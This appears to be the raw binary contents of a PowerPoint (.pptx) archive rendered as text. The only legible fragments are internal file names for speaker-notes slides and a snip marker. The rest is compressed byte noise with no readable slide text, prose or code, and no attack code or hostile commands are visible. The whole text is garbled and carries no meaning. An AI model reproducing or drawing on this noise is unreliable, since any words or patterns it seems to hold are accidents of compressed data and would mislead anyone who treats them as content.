bX.....%...........H..M........l..]V.; ....H...D.s.P5....Z8S)JN^.t..DR.+-Kn...g.La..f..Q.....+...QE...;.Y.j.....wHQ..T.o...d..^.71m.4.Z...4.....Z0...wad..x>...7    ..%.iy2^...+(..........|..\.....t~.7.c..(.~.s5.o..|.+...D..Ig..........    .dEe.....9.    .Y.f..H,.K..H.......U$Y?x).......Hr
........b,n.......>B    .k#.......
....`..G!.o.#.}..+.o.h.9.qI|...b!..A-H..[.=.'.\r..S.cMDm.`.#.A.A.On.*B.aZ..g...{....d.....b..V]/.`..!\_O..<Pv...z.<.q...?...E.t..O..{m.-.......!...]...0.....kBWZ......0......|A..e.p{...*W..Zzu..v<.P.8    .......q...f.....e.K..oA.. 0....%..B....i..X...rq...d<..0...f......s|..:....3...Nwt.....8..>%......]....{.^.Q..5.......#ez.8.F...........w.8..tC.Fq....5....+>..........PK..........!..Y......J... ...ppt/notesSlides/notesSlide27.xml.T.N.1.}.....6l ....THm..|..g...V.    I..{..,P @..$^...3.....d    .7F.tw.O    hnD..%..>..R....I...k..d....-.    .    .k_...!.".<.A1.c,h.U.)....3....U2...a.X..&..'.TU........$.$.......l.=....iR._-....I....v...._....K..r.H#.1J4SH..6..[......I.....U........J..../...V....?....._^~.;.
`..E#...s8y.g&...B.9..d.j#.8.{..f.....=......+.6.q...N....Z6.d.....nlM..".^..5.e.m...].GZc.c;.A.f.&.1..m.owzk.....D..W..EX}..(l.....!.N..TM............@.X."...DNK
.w3.D4... ^.....x3@a43$.......N*g..0g|M<....]#%..L.9s.D.#.nRE.b....Z...[D.:.x|K..N.v.&.u...X...P    .    S...Y......N.D.?...x.M%E.....A|0....yoox.....y.?>......N....~...i......gz.......D..1|.L...4j...........2i......+..;fC....^|].?.......PK..........!.eXM$c....... ...ppt/notesSlides/notesSlide28.xml.T.n.0....w.|O.&@YD.....FQi..uL....N{..;.......89..w.
...[SNIP]...
-c~.FZ .........b..m1.cc..tM.:w.0)E.[h.iNU%..+........&g.U..%\iq..'...W.c@...|Z..?.e...:.....b.iT..'.`....2n.oR.\.;..h..d..Z....\4R.!...2fn.!Y.hU...2K.A..u....!......%.I..f.q......'.>.{..?..b..u..f./.Q<%%
O9.......I......\..>..l7w.....kh.b..?)A..j.G.Zp...~|........e..B.p..l..G$...9?...12yg{    ..G.....e%...L..a..;..............}.|...lxb.[...?q)..w=..oPl.....n8V.....%*......Y8.C.?LC}[...L.B/....0..p.........p.[...j..!.fn..v.<.#.OnaW...-t.'......`JF.<....B.S..........<.........Wa
0L.......H..(...a..?aS....b.FN...$...6Y~fr.F....-k.6.kj.....[@......T....#..2    .....9..5mY+..F.'.4..B*UM.....Ra@qT......\V<.U..7S...eB.P~.(....[[.~..`......r..X.:.0..c3..m*uss....26.-I...5w.ZA uMa...S.)#W... ...t.5I..Dw...E.)...d..5....`..Mi!M).,a....L.4H.+\../...UneS.4C"..
..qkC. ]..g.nV.... ....V.aL>!{vFnT...~#.5[.%C@....Rq.F...I....`...!Y....d%.....m..    e.2....1[U.....j......y..A.O..0a.=."..../..2..<...2...G5.^.mJ.mE....\.......B......]..C.....>c....s|.?..<.k.-.....uF/^.......Z`'.=c.4p]....$<./.-Dnu\.......1........+?.pl....v.Dc....Rp.B...F....%...D..{.D.K.....p.}F9~.8..p.....=.....+......{d...G.......%A.p../.r.O.>    v......w......E<.5Ux....3g..i8a....../....|.6.o.J@.....Ze..o.*f.G&....V.(.L.c    ..1..dD.@O......)..fS.U.B...q25...5...]....g..e....W._WM..,.b.)2U...%..|..3d.ly.0.;.8.?.!..(*YN.Jn.m....K./...W.%.^.0.....97%tC.Y.`
.;`..`.....m..M.1..5....f.P.p.Z.5B.\5.T....     ..E......-.....a..TN.p.-..V..h.n.....b..Q.$Ko...A.B-.5..[.H. .`..!.......X.aKX.JN.....Y[ ..6...OfM(...:.....&)t...q.k...~....g...v.Aa.c'......t...lh.q..~>......A2....L\..%...b...}.K...vy..H.GG9..t.....H.='M......|K.....in!R|..R..lyU.b.p.l^A.{.|4dC......o..D.^...~..........H..5.u.|......N6XS..Ht...E. 8..R...T5.. ....<.....1n..>.~w..3B+.........z-.-..e....O|..K.!A."_..=?....E....}..<9O?..7_..A\Y>p.i.H?.WV.....w.F..#.<Z.....*C$..~Ka...^[.x... .f.?.u&7.&o..1.o"....B.y&.m._.P...?.....B9D.    KD.....7I%.......7.%o.b......S&..&D...9.7...B...M.5...D..h...@.|..IX.dl.....lf...dH'....].T...ZOP...}...!-...d.......
a./.l..7w.7..{[K....2.....[..bG.=d.....0E]..b...u.+z..>.......~..22n....m..{eUGu5`....{zz.c~XO.F..lY............1..N.p...KKK...g...$q....>.".:>....mm.f...[............>v.%;.......V...]'*...............#S.@...u....V...U..)..}..O.g....N
...?al.K.O..|.:V.`...........C?....UY..B..E.T.........3g...u.mx.a.in.........5...6..C..L....,&....O.....1?..P>..>..nYK.+iX...a.,......y.g..."L...U.t....efz...)c./Xy.|.2y..!.3...d......b....T.~V..4mL...R*d.......G..B.....+..m.....5l.....%...'pK.a<A.....3..%cK.5..3h...h..5f).5....,i....Gyw.f......*I.'2H.T..t.Q.[...r..7x.4..;E.?]..!L[c.......s.....3.y.........o..]u.ez....@........_.'..h.h~..n...|^.......)."...;M............Y."...O.}..cie..Q......kU.p...|}......O65.........hS.......#8(H..9S. WtAF.]..E...N`..........w..x:.tb.ru...Q.,o.+    I    .JC.x.T.....f.............}.O.......'..~>..=.d.;..?........@}.    .....zc[.jUII........`?Y.......J.... QQ...~.a...\...    `7......3..Pm..fP.<I...
T.`.-.V.}O.T..N.....,...>..iLT.....i....B.w\....h.^3.{a...R..D....F.../b........'.%..72Y:......[.....g2.$.....\..06...P8;P.AH..V.....RF{..%....f]7.g
...<[....TV.`...2..D*...~..W...>....SD.q.....0........B    .4).a.e.....em.T...A.Zi..|.............r.y...*v..w.....\[jg...~ 7.w...."....):. m...v......h........"..........^.....a
.......Ij9.#.R..:g1..~.......6~......a......c@ .2"..8..S.Nd..................w..onAD3.I.....;....u.........<&Z.y.R6l.q.*.........?)...-qt.j.<.[.t.R~...s...g.Cf..B.!.2.q..d....m?H...-..l..(. K.d..b.......1......|....!{#.a..q_w.<....U..Y2kX.......Gy0........ja.|..q.u@Dd8,.....6..g_=....t.2X1...
#..s.=.7...........1...2....w.d,]...W_..i...4..GI0i.4.....R`T)..X...a>..CU..=....}4IO`H"l....5.~.t;..D.......H..x>?d.b..t?..S3.Z..w.}...,....wp.w...P..W,,,....M....i.8;....n..k|...G...4....2..%........_..z.....{....S..v.R.....M.|.    ....6*A..{..._V}.............;........?+.G....>B{..@ ...D"!~........
.....=.`..5.............
.oh-...E,pU.I6.+.+.......3?g...my.E.]K}y....d.8.G....XA6.I[.....    ...b|....EGD.......<.. ^...'......?`k..~4....<.HIi.[.,....+.f.RmX.B.v.T..G~..Y..[oi...8.k....k}
...H..A.,c-.G.}.t.*......C.`...?f..zH=<.s...(.p....C[......0......X+.M(.J../....3..zx).k.~!...~..Q..!..v..s.!N07.....c;..3b.F...u=..j)...|.N..<f.7A..1Q...._.bg..]...gRc...Yz.QQ........O;.......+k.nh.x..r...C.O.......@..k..D...8;./..`.).[. ~zX.^..h.~..aa..CH.d    .Z>.....#`..7z.1H.3....f...~........{*\Q`..e.. V..Ra.
3.....7K...... ~....mT.. HH.8.........k...`.......?..a..1&.1..l...&.......a..#.....rG(b.C3...F..m......sz..{.....P.o!.......)....n*Uv.}.W.,......./....E....V...#.......I>3|.. ..~.....J...2..?B.J..'Ln............k./.=z.\..64~:..r.....Gy-..J.(..{g.....].....1...D...]..;^.._.....#......y.....:7!H..3..~....}....3.[......EwWW/.~...F}h0&..A.../8.z"....V......../6p..Ma?d.@q...J....p...+.. Y..%.<l&..un..v............../PW....SQ......z...T..s...r.^.J.n..
.|..C......C.^..3}rSS3..a...~.]......{.,............zo_M.X..@G<...m...|..SO..y..B...C.".....V
\........8...<.$.y"..)../.w.1..0..,..".....4.2r.2....N....9.|..h..&.?.].H........i{.Q.W.R.............2U....,t...
A...N......}C6..6..*o.....v....P(`:...?...w@.$ .............&.m-M....hSt.9.C..Qvu...!.jc........nb.0xg?.|!........5x......^...V.w....Q`.g....,.+.......7..S.0..1.a............#k......h.....O.4T(..Rx...6.......(0`V.owe..!...#..b.....=.<..s....q7.]......x.......'.x..e~MeTmU................/.....7..t..&.....#...o...IzT..3........../\.. ..?}\..1..I ...H..v'.85T.Vm.....@.}..o.TW'.._.14.h2.`.....?..o..~.....YC}(..m....R\.).....]iI....@Q.~..{....S2qV.............[...b....b8).m...v.......c..?.Im...l.}G"`.....Jz
.T..y.....m.....X..b.6....rua?.|...<..ZX..}..p7....6.8.4.#.........4..6.<....@;6%~~.....lq.._..p..1....@.a>-2..`..+?..!V...P......g.......-j.Y........z...>..e...D.6..{d-f.....=.t.H......o.w.Jwo. [.@..`......G.3..}....Y.&....<.82a...N....r.6../N..<..7....d.#.+/......../=.z......H..L.^>...~....[P..N.d.?...w.ww.8.)..G....=....c..S*..|.r.+...;.....7.Uomsrr.=....yF..2..N0.o.y&(,*,....'..6...../.."......~...z5.CdGl.    ....^h...Q,....7(C?n.`..".'.e.kQ3xz.....eL.#r.8i.\.?....Y`N........_..X6.w...X[$..`.......L
uE
c..v..1.a.......F    \.........!.wvv.{`P&"r..1|..k5.+....../Yv3D.`.a...........,..-...5;..o8...+....R...t..^..    ?..%.F.z.N.Q?....o..A...D.b>._.....TW.......4"...PE...I....tPh........QSQ.............{y:    .<{..;V..z.......
b.............".._.9~...{.c...=..[....g....-........746.......!.jm.....T+33d...AB~^........`..)...<..a........&~B.......(...n........o@.....#.0....$ia.rn.... -...........Q.....6..i..4..L=..4.F. Pi.XO2l.....C....;s..6...~...2.'.x.V.......'..r-W@....'#.4..!t7...q.i.]..a....b.............e....V
...t>..^Ag~!.f.|E......=}. R/M..p=B.G.. !pwo.+....
`...;x.......a1....h...l....$....1....N...7/.>%..!w,2P.......GO..Kg.?,,.....&v0.C....|....o
_y.g.6.....[...G;
.....ilj..W..TVUWUVUTT..W`/-+...F..O>..F......W7.i.?P.u.S......qr...y.nb............I...'......Z.i......>.......g....}8F-...(C.@..X:X.....tm..%...A...."4. .........N..E.....c.:-Y\..........q..........?..a...?..,.CwcJ_3|j[[.R.J.+..S@...................i...    26A..............=;...v...n..]..<.3.aq.7.#.w........A..:......p...k:~........ 6...D..IO......@}..g..z. tv:..s1._V..d.#.........f.e.......y..GR.~B*..C~[."=6@~eeUUu5.......1...V.4....d...!...?...l.x.Y.h....>T.........c"....~x...i_..O..Z|8.i...F`N..). %$....I.....b.h.f.....x7g.....P.....o..&..O=....$....T.l..h.T"2?5.Cf^.?..;}2.....IX.[..a.....U...R.J.+..O.....p............;:........;>.8F..i..R.....?z..L....Y.3...J.-Mv....g,..1.. K.>..Oy...=A..........g.k>......NXXMCbqp....UI..b8..5x[......P...}C....s..*++/-..
.=<.....,B...../....S..t]C}G..zW.`.......#`....{:.z.yz{G..............svvBx...?..Q9g..j.U;..`47`B?...7/.'~..n.n.~..1@..k>.....~.......L...@(...............s.W].)L.c.9W~..!T...p....:~...c]0.....s..Buk.+....R`.....w.].!n...O..B.....n~...1<.!.on..g?.....o..Ri...uvU.....lb..s..GY.w...(M........I.&.9t.X..|....Jdbg.... {8}..6....oyL\..m.b.m..t...Z9sm...2..''.#..P.p.../..g.o/.t..=......../m....~......=W,.a...0.]~..".-
Q.}H..........Vptrrwu.<`=.KC..3;...J....]O?Z..-.......
YR..=l.#..GJ.o............S...l=l.......+V...v.{."..A.....W.}:i.jS.@......}X.C...GI..3.~(.-..g.qhm .........%7.Z.J.+........wtrwr..7.t.>+...v..Q.f.0..?ueM.'..4..7.{..u.........!.P..V...X.1vs._.:.....Sf.+$f.............[...z.....k.7O....
(...h..s%....}G.|...sf.a..1..0~..D.....0..R......*........>...r.......    .....c.......{.{.....O...........>$....l.~..H..C.~H...........~0.@J..0......c...=k&.....12D../++K.....s.DI..`L.$3..b../.~.Q.<...&....._Yq.......P...R..-...b...2...666y.44..)..1.....H.,.......;.....h..!U.m7......5F.e.#T.h.....e..T?................L....;....?v\...G...<{.&h.Q.....s..g......5n..)    ...e%5....l544X....3.....xuy    .    ...Z...|.+80*..B.._V.x.Ww...._.....Y.\W...Q.m.?u.$....
_...fs.......-......I..A.r-..5.=.....6y..I.'B....._>D.Gux..&|.n........E4#.....q.-.~.*`m0L..AQ.........s..9E>$..u..ko(.-..qC.|......:...Q!D..|....zp.-.-......    9
<-.3Y.....(..BF>U.[.J.8{.......d.....fc..O...~.4...#....HV...KIWe...x....H#.(6./..2r...)d....&......    .F.....Zgp...~|.    #e7.V.,..."..q...+J..O....3y..;..G.........\o.!...`...d....)...p.....7;w.x...?..S..+.....O......m....(G.....n....c`l.pfn.d.....v..D. ..#.@I..    ......./...x.X.P.......M.k.P..>+...1....+ET...h...........".......N..k>..q\> .."l.....w.F.tQ..vv.`.f.e...p..D..1.-    .?.k........^.@....
@/..v]\B..C.I..?......J.......~..V.W......=..k~
..@.......}ni..1.G~...{o.....s7.u........].&.......n...R...B..aI....N..$.=e.)..F.}]e.vzY.....W..E.]...H.&.......z8n.oR.<..S.jQZ..4p...ak&....0N.+.e...t.b.zZq....f.....~.2..>)J5BY>..$TQU.V.-T:.&.5.,]wC.........R..E@.....4...[[..yEu..:...&M:|.0\..H....O;.......nn......~............%+..M.....@......v{..e...%i.}........uvu.5.....y.7.\"h.=.....:.....x.!..@....?..B.....p......BO......8....>.....6...x.&&........s.Fba..n.....~N.AQ........CI.....?...>B......5.....g$-]z.#..f......d......c# ..x..Z...|0...`u.O........../...oV.T..y..I.../k......~......n...E...pv.M.....&.D.iJ).Y#e.....`XY8\...MjR.iJ.i^....U..,ZeB*3......ZX...u..0.VEa..7l..&.U...$...".@..
#..Ql.d..@5/U_..y[.b61..
}....Pi+...Sg.,...G.:.....&;...'.q....]\\.X..||X..S.>t..M..8.#O=..`.Q.._WU..le.
Q.........o..)S4i)    ....o..122..._...F.E.h.].5...d..C....~..a......k+v...7s...z9C.Y..m...Omom ^.d.2.G.]h.|}}..CB.=.~$...@WW7...O..(i....&l....y#.+...`H.r5<&..C[A....K.`~x........#8Mx_......?..........?,.......'.....{.f.....c...?...#n?./....    ..w.|.....~4g..m.....>............c...`.!.G......0.Z|...,.....|>....7>u.C..g....K_......>.t...n}.Q.....xll....#2......W..]..d..W....wC..3..Bv.#g.63....F.8$...d.......5.,,..g{U.6_. ..q.[.VR}.J.q].*.....2Y5)....Ra2w...6.5...%.(*...I..2..t...1.%..I.!?+.0...c.A3..^.]
........C
.`.it.....'`?....^......s....WUsc...5L..L.|..q(...c.=.g.................m$Ns3.ixv...$p...B.+..9p.?8|......7uGr1...bC.gN...ip.2...P..{_[...S...d.t5A\/vp@.=.....    ..'..~,.....0.C.m..>>...-.e.qC.F.    ..;..y...Zax......u.....:[...l......g...T..0..W.6o.M.........'...gr.<..?$$.....,9..?*..h.Gdy.....2......W.......a.7az...R..$4......._.....|.
{....!D.H.I>.....Z.....8.......g.|.x..S.....b.taG"J..}...;>].{nWZZ.k.z#m.<5.'l"...T#.O...2.....|H.........[ .},.N.yz...YXL.@...?...:........3.Y8H.w[..=..(&_&.g...F..g.......ZK@....rS.i ...._.-..k............q0..U.....    ....g8..+W.j` ........ ..~9F...t0.(..,@.. @..Z....}o.lp....!5...
..m.l.....'/............\.k..FPC...@mC}H..x..I2yR...o. ........`.,`P9]..C
..PY..9......>..ip@nGt^...L.....M....;.."s/.>|l.g..>.b.....]..O/........6.m.n.awp...g.<.5.M..<....|..\we...I...........I...\.rxY ........4......at.].2J...........f......F....1Q.lV........{...Nc]O...f...D....Q....)=S.&e.
.....z.....RCB.i....Z.4el.E.el....m6>k...RqcU.,.Ha.:....D.o..5
.`?....
t...|....../.....$.?\.mD{.........tM....../......0._......_%h.!....P...*E...>p.k...3..K.S)..........|......A.}.....o..p.<~..W5...:......>..o... ?...C.8...dbgS...G=.6D..........`...F...6..x......W.Po.. ....p..>4...9...'/^....k..O.N...z.....q..+Y..).rV.......y.....)
.......L@"...    .D.].....r.!.v.*"$.[[.X......`<..N<+....i...y...[.~...f....v..|.Hi....m_.*d....N...k.T....L....f....,.H..w...M    ....[...).e..!D....*.L*C...8][?..e2.....N.;.    ...
A?..S.H.}#..L$g.k6..na-....Y5D..P"i0.......O..Y...h#R!.)..S..4..    .......l....4...3m...G.{.u....f....?..:.!{A..}5..&.H2...........f.3...................(..\.Q8:{.{.        .'....4..y.QK;.....S."    [TT.....Rt..h.*.. FE....#.t.....:.q...*s..........noow_"/..WR.`>..B[.w^D .......G..5.=.M....^....&{I........4.\.4..|.....R.K.~..<....?a..U..n/..Y..sr....PU,F...ys...Z.dv-
......q.....#H..h.........gj.r.....z.6.k.O...    .m.!.Boo...3.~)... qP.Y).7H..".O{R............N...1B.!.|P..c...........S.=.......sZ5.....u.....o_[.f....K.1.xC..f}.....,L.,d..Y...".....#.eh;.2..fh....P..bXO3.A....l......e...3K..S..t..y....{....C...~Nu_C......)...W..m.._.........@...0...z.]`......p.J....;v.Q.~....;....A...,>......o..q....a.....}.....`..7.............6.]mh&..D.1!..c.Q..8.Q.....c....8..|W{.........,..3....l@=.$.P..SD....h..q...!..k...<{j..._Ov.z...=.oP)..ix......d.......c.
.h........7..o(z..d3.O....7....*y..;T6k............B...cc......~8......l.?.ak.9~.xL........a6
.,....D<n.'..5..Q.N.f/...K..j.Q,..>...SFV...B..I)L.Jfm.W.3.|r.......p...a[.%.b...}...5{...N... t.M...6...3.z.U.....7.c(8..\..D.gT.......n#....ff.a._C..;c.h@..3|..h....2A....M.I..3:|?<.(........o..."1....w..p..@._................=..~......4....'O.D..m.....*DD.8...!..;....w4..z.1......
@.$.    J..>(.<{...hG[;~(......z....{\..nN..".C..."[.u...}......v..d.\.U.....
\O..0H.    A..Pq.... 2...5...OO.Wt.....c-.zz.Z.../.|......;.#..`..m.........0.y...y..|e.....M>b..v1....4?).w.......M...db|...|.@...~.<.....#...`#..
.....>..C...8(.q.../.6.....^>...1.K..........2Y...l.0e%..m...N....r.<.../.UF....o.nD......e    Cc.......A......0k....Q.Y..W...._..i.,mQ.....0...6Be^Z...a.>..L..X@~.....:....b......>..p..Cb.n :.vjv.........(..R...5g.5.5..`.'.h.%H.(BS....Sw{}Lt.?...#G4.yj7w.}.%''#.....~..?5..&.XF.._...=.uN..d....w....Y....M>..Wt.P.....^...x..{G8...~.G.......M...?v...3M.J.....?r.........@..Cbl.-./B...-M9k.L.;....9..4.....Y...Sr......h.-y.-g{t:...Qk....:...gW..+P|w...3.{.^{.\...>..T{.....YB7.......^.....nI.R
.C.l.r.j.....e..._;[nn.P...x.._!....Lm    ..........6...|.H.n..g\...)+nm.a....%[LN..T.0T.......@#K .......R@...    '........<....UK.T..4..Ci.#...#+..-U.6..{.8...B...3I...T.#    .qI*91.[v.f...mM.m2.......t.5...;.....X....N..6./=.Sy...WQ...uUe.....?..=]..7....o....CG1....e..%.N`o.......?..5... .d...>.......+D.8y`......$...E..8.G[..8=3.%..ENN....    ...R.........o..t../..
@X.{E.*D.D.....n........?...b"..j..{    ....>.go......b...{uu..QTt9;..\.t...}.......`...E`.~D.....k..."..l.F..:}&:........W...x.X..s.r..../q."r. ...C-...y../.g.o..........hM.up.W.[.    B....6....u.....}..!.......Y.yN.U..v..&S..d.k".U...<<k    +..K....o....<....`3..2.,a    ..."v....F G.$...5..LT.......1h.&S....#L......Vt`...z;).Qt..../......hik..W.}...}.~r4kw...
...i.W.%.Lql|G.....Y.a....W.b... *67,....]..oprq....H.c....{.......>....w...".4a..2.........Z.....C...>....c..5y.......9~.....N.!....`.&p+..;....,.....aiH...h....a)..?...o..$
....W$.x.=.-.Hk=.v..{.oBR...t."Z.......{....(L.....6.L..[cc....v|.....cU.M|....,.&@..P..1......;...#..`.p...3g...u.mX..........-.....5...../....gb..4,.S....F.<...Y...o.|.L.Me..ku..&{.Z.]i.%l..B.8.1
.....>.$....&.hK..0...q.wWo&.!6/kU!..?Q.C..Z5.|.,.......&S...05.t\QRPV....z..f@......4-\R...o..i..G/a.#...{v7.Wk[....v..Hy..6w.e]-....r...    z.......IG..d..E_.4x....}ia...}...+.1W.M.....2.J......(f.o."..>......rY.....n....../.ud....vU......0......... ......^..lPx....L..t...~.Vo.....gL....a.`I....IS.Q......7?N.L.|".$    .../.....&..n....].....}.>CB.\Sr~.9.Z........~...5rP.[...]..T..)*I...&B....,....y..2L".q.e....3....T.OT.`...m+....8%..N..F S.d.3..oh...........`H.......Q.g=*..1H..r......?.x..#N7b.B.N....G\:-..K...Fm5H.2l.@.k..z.X..}.4gL.g.~.t........d........[-.......=.V6................$s...\...^.nV..O........IacbM...w..A.Xd.@s#../.=.Am-..&...i.....1W(....?.@..s...`?.......HQ.T..%...W6|[[..&.{.....7.H. 3(.'.SI...........c.A......-....]......_.Ht..n..rE.;;^......=`q....*E..v..].5.$..]........:z|..'........    _.D-..k........eM..N.9.{.....fb..C.....~1.=.....>O_..~........8..V....t..W_}.q'.Q;;-..40b[|..lA....X..O......y.....^.l5..G.......,..-:.....*C...jS%6...T..B..{...6....0.v..8......m.,!.......S...Lh...>..s.......T*..!....=N.. .........F..N......_.K.y..%.....1.....Vi(.x.......>r.#..............K`.*E..,X...G..8X...+......m...n..%=t.k...y7.;.    .......-l..E+.%m.5o.*.a..........\...vw.w.X........0..=.......Wcp......o...b.".S?c...~.,LG#.......p.R.RLqW    .....i.>.._.[.J.PO.aa......qcozd...r...q....Pf...S.k..~...(<........I...n.T.....7.B.N.>..u.........EU*.......8K...."u4_N...g.m..}.._qZ./.,..D.....|....}.9.id.$.1uMT%S6y/...o.d&..7Hz...0_....E.\..@..Y...>
.>Xg.iY..g@..#.._.?}~...3.W    ....gQl...W..<...a./.....s...j.2.........P......./@>.........O...iE..x_]...c'q.9.."....c9..n..-..    ..hmB0..a1......T:/:r.....W...05F...;...#_..(..l....Z...X..@../.3v.Qx...H..2...h1......a..5k......
...t...]2[....g..............}..............
Za.    G.Hh.e.....w.o....l\........'.....>.!...kk[..y...{f.......H..\|..Dg.H3..OCNK..1O.o].k1.O..
.l.KF..6....Em..i..T.UE0,.81..T.*..,.T.H.?...:.........%.a.DS.I....0..Z..(=..&..[[d$2.L...w'a.Znad
......g.....t...F.'.p.....X...l...7...u..^.....!..LB...:......<.A.
'7>O.Y........bshD..v.6...>.x.G..{d=...O=v...]...........~.N._...v...q..kNp.;:..k...w.........1<...L..s.!DYI.m.$n.l7..?f.A...Ae.=.......8.
X.06.d.p...m1]..7.@P 8........G.a..[.2..,.{6..2H....j...x...#...}..{6o<........1w.)^....w........Y.N.y.m..]d..+......d....e....I...Z..<..'.{.~]lp.}.......}.j.....k.s.f.!-..;..)....[.a.....n8.7us....M=g..OV(O......oC... r.j.g$.......#....~....&`..Am...`c...F'..V_.u.:. Y..2J....I.......K.3s....... ...0o..V.)P.N....`..........D.P.7.W..H....<...%...e...........r.GI.|'M..K..ill._...........<.6..T..../~7sv...Uwv...v....$..p.5...2?hQ.......s..@.M.8.y......f..>q.'.
Tx.<.}i../..8.z..'?u...*.
....{..]..1.uF.>3...........;....pN.....2.....9.....p.f$...c......J..._..u
..V.mm.m...--..r,..+:....].m.....F...S..a..T....].`...........7O>..........(O..i...s.Bn...7.Fb.+dz..d.......q.C"..ts    ..f.J.g..%...X-.b.j.5...0...eQ..s.....ezV..u..-.0..q]. 0t........$pL7.Z...~.>&.d.T.P.....3O......_.R....8..~..y...Y......{Ei.@.%..ry.6..M?.....J.2..~.Q...w~.....D9....pW......N...xH#l.... nx.].z+....>.&3.......Q....Q..c|.I..]u........O`E.*g.......08.....P.`....f.2(...7U..3...LV..i..8[kD..7UrSI.....A..."..{t....y..........;....@l...G~.>...o.......Vdynhl........hVv4.65..4a.ho....SW8o.......y..*z=#!...S... >&V.[.n.....o..............q6n...l...E.x.8..a.;p..HZ..H.>c...q#C.bV=...:.25..FT....+..m..B..@...m....RB..P..$..uZB.>5h0O..F.;...U.P^%........>w*#2.*..X.G..o~...o{X..J.-MvY....;u......h...xB.
..............kk$.'@.../.p..\.`8.....F{.;.$.....Ef6..kk....'.bho........L...........NE.\q.T...f'/.......a..;.S....2%.ajY...<Ec.......d.H.S.../...k........;t)..............R.X.......8.SxC..nj.7...I,.rJ.q`*..%..^.P.....>.....W^..*j......._?.Q.._o@M.....
.............
.....P.75...V..*.....|.D..b..G.t.......-[H..M.)....d.c.-H....Y.B.S.B..:............%Y..L.uS..)1.fx.a..    ...JZ....u....m......3..K.5...,jU....5=...#.m......F.    1..?...........+K..8..;8,.........`...@T.).....r..7E".k~.q..C.^_gw...1...=.5.G....J.........O.....v%..s.../9...3./...*....t..<.^..G.>.......?y.    ..|~?...3Z!........7.....]_;KC..n/~|8V.....~.........qW8....2H.RU.......|
...{....tT....3..:........'...m.}...J.o..k..c..%...P............v.    .#..u`g...3q.'...z...#.=....Q.....
.D..ogg.M..g..#PzA...I..m,n......S.f1...]k%.....2.......... 6%..........SO<.t.b$zF4.N$>R(.8NJ.....U...bE..-..Q...4u.d...........A.!.I.s..T....%.[....0..x.L.:.!P.>~:..#u..#2v.....t......p@_p...."._Px......^...=+..k...R0..M....o..i..ic...........r.l...o.:..V{@w....)...s.q.PX...lo\B........}D;..l.Y".UO...V....~..zi....c]v|r...3b.i;....f..-........?.=.5.S.....#....8..X....S_T.....@w...w.c.*...5....S. r.Ig?$!.......:..g..8:...%V..k...>    ...C.B...q>....Da3`O..'...l9{L..A...=.~Z..Wjr..GN..    ....-.V,......y..Hf..)...".~.;Up....A......].....|u5"........u......^.U._^.....r
.w.......?)...%...D.7,j.P.6...!....va.....h...Zy.S.......~.K...    q<...v.X`..+<w..S...........?....."
,."cd....+....J...Y............>>.61)P.$.7.m~R@h.~.^.[..'......>...h;t. ..x|_E~q./....r...g.RY...*..B>.u1a... h...........>.....#wb...!.......9.....P$r..
...T.m.l'......X..~...ot.....og...!.V+g.-.._f=..d.....wO..%._~..>.^@...2....#<.Z..r,..._(...E.DbePS........(..D....*|..|.UxS.C.R....>.?...F.kbD..].......    .
.@.....>".H$U.._.RT5PS.....~...H......?........NND..h?sRb/..;q6..K.."..F.c=..%.rp4..p@..    ..7.x..3r.26..?.Q..p~3R..K...2m...I..:...m...'N.|....@..y...z&..
.u..H[./................r.R..'+R'N...Y.at#.....L=p../.........R.........?.....L?B.D"...8;.5.V..C.0>:,*..0Z.....w...U./5................RS.Ux..)1B=...........V;.H.zD._z............"~..a-....B.....[YQ......P.h..w..r..w...;:A..M.Ec......In..J.................g....H.<|..>....2v(.i0] }I...6-...zwN5..lyE%..CZ...<..6.....*K].Bc.K}u..K....    .<*3.B.....jh..]y..!.......U..q...r......|.]KS.]{G.......Y..n}..........lgsO..[..#.............F....o?o..#k.=.a..H.......-.....o.!........w.....3Z......M{......+W......i..o..7....Ibe..0........~....!<$.m.^^...36....^.A....N......p.4*i.e......?j!_..+...3...x...F.G.{..k{&.W..G.+S"..8...?....=....%................1........o$!.....N....U...........R..S@.....B#.....$ozZa`-...p.....by.!..)....#...T.0<.3vKk[7.............../..r.x..k...vr.....yW*...?..bGb.......~^...\0.~o............!.#U..G.j..OO.Wt......$.A`Uk..O..v..w.H.*.C.~._...)........J..7.h...q/Y.)....:@h....ss.5.6...
.s..'.\%... ......k%....G_}.UCCCll....){..i.......x...9.VvX....;.A..VX,.6V....>_.....K..*.............T*MHH@.eS(.....b.lnn..9...O.LE........^.{'...FR.....r........../......<....o..(6...]YY...........J.g#..ur.9...........?z.....R........n.E.w..;.T......oG8]*.G.\j...r.p....C..n..B}..%o?.6.....h....s.L86....._ ........L<...!...+..    .8~.....}Vu...x7).~.k.td.S.h.....%~.3......=..W.*cg...-......hk...n......E.....X.`....(u....r....]...m.....
..g.zr.d.:D..{......W.."0&...^.t...e.f...l<....
.....*..._|.OQ.X[
f.7t..........%-...qp....p...4k......[.|.Ie..........y$M.....Q.5P....7....>}.J.dz...x..cG]T..p..^..........p...=.?.?.L.,..3.../....a...\.bg..N2-j.:.....[Sc3"..............1.._[.@.Y`/...U.....+.o..a=g.....H.#.~ kG..t.X.p.w;.>_..;u....... .x..."..E..@.\.QI...... zt..~N5..........=..on..?e..n.V..?.......!f.B.......B.Ri...........3....x...b....X..b...WV.n..z....WG.?....S.....U+H&xS..xv....E.9..........
..@K......Q.(......_v) T/.xv...$......A..+......\....n.xg-....n..NCH...F.h{...z:K......a.}....w.....1c...[@@......}kk+JR .Fe....L&.0a..e...3.8.....$.....M.".....65...Q..~.Ky.~...-?.O..?."p.......p..O........!..=.......?.3.....j......50(@.....&....FO.4...i...~.k...t....lX....R.2P@?.. ..
..:u....)....l..>l...++...k...{....nj7~.).j..+....7zMJ.-..W..u.42?......;.l.7..'.......    ..(=u".y....H...5..~.C.!.N....Y..e..+....E...<B.*.. ...l.R....cv5....(.IA...G..."....z.E......{....).\}...ix`..a..x..A.A...R?c.?|.../.q...|..~B!...w'..^.    .X':.............\..sw....=......?y5.?...4....n.XEEEEUWWC.oc....?.g0.@>.&g..y........?....?....._rr.C.=.l..z`.....@h.>..e.......z...w    ..T.....U..,:JLL...+    .?...3....`$..t.v...OV..5z..EN!.....}.T....GG...(x*b.....p.+...q_"q...tsqko.D.....p.................o...+....R`@
..?.t.#.#/j....m....H=..j.n...H.....5n......F;............]oM...O?...1._st}...m...s.~..#..........,@..{Co. X......b....4....?..t|."...^..:../...{..i9.w.......}...CGR.]X..7f..)......0G..^gG..gL>y.hxl..I.....~.......X@...
]
`
